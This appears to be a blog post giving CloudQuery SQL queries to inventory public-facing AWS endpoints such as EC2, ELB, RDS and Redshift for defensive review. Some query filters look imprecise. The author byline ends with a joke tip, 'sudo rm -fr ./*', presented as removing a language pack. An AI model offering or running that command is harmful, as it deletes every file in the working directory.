Using CloudQuery to Identify Public Network Endpoints in AWS

Queries for identifying public network endpoints

You can try creating these in the CloudQuery portal.

The following resources are not supported today by CloudQuery, but are coming soon:

Supported Today

API Gateways

SELECT distinct id, 
                hostname, 
                ip_addresses, 
                account_id, 
                region
FROM aws_api_gateway
WHERE public_ipaddress IS NOT NULL

CloudFront Distributions

SELECT distinct domain_name, 
                account_id, 
                arn 
FROM aws_cloudfront_distributions

EC2 instances with Public IPs

SELECT DISTINCT id,
                public_dns_name,
                public_ip_address,
                account_id,
                region
FROM aws_ec2_instances
WHERE public_ip_address IS NOT NULL

ElasticSearch

SELECT *
FROM aws_elasticsearch_domains
WHERE endpoint IS NOT NULL or endpoints->'vpc' IS NOT NULL;

ELB Classic

SELECT distinct id, 
                hostname, 
                ip_addresses, 
                account_id, 
                region
FROM aws_elb
WHERE public_ip_address IS NOT NULL

ELBv2

SELECT distinct name, 
                dns_name, 
                account_id, 
                region
FROM aws_elbv2_load_balancers
WHERE scheme = 'internet-facing';

EMR

-- TODO: Pending https://github.com/cloudquery/cq-provider-aws/issues/221

Redshift

SELECT distinct id,
                endpoint_address,
                account_id,
                region
FROM aws_redshift_clusters
WHERE publicly_accessible IS NOT NULL

RDS

SELECT DISTINCT id,
                endpoint_address,
                account_id,
                region
FROM aws_rds_instances
WHERE publicly_accessible IS NOT NULL

Not supported yet

Elastic IPs that are not attached to EC2 Instances

This resource is not supported yet. For more details on this resource, see the entry in Scott Piper’s aws_exposable_resources.

ElastiCache

This resource is not supported yet. For more details on this resource, see the entry in Scott Piper’s aws_exposable_resources.

Global Accelerator

This resource is not supported yet. For more details on this resource, see the entry in Scott Piper’s aws_exposable_resources.

Lightsail

This resource is not supported yet. For more details on this resource, see the entry in Scott Piper’s aws_exposable_resources.

NeptuneDB

This resource is not supported yet. For more details on this resource, see the entry in Scott Piper’s aws_exposable_resources.

Prior Art

Kinnaird McQuade
Kinnaird McQuade
Lead Security Engineer

Always remove the french language pack: sudo rm -fr ./*

Related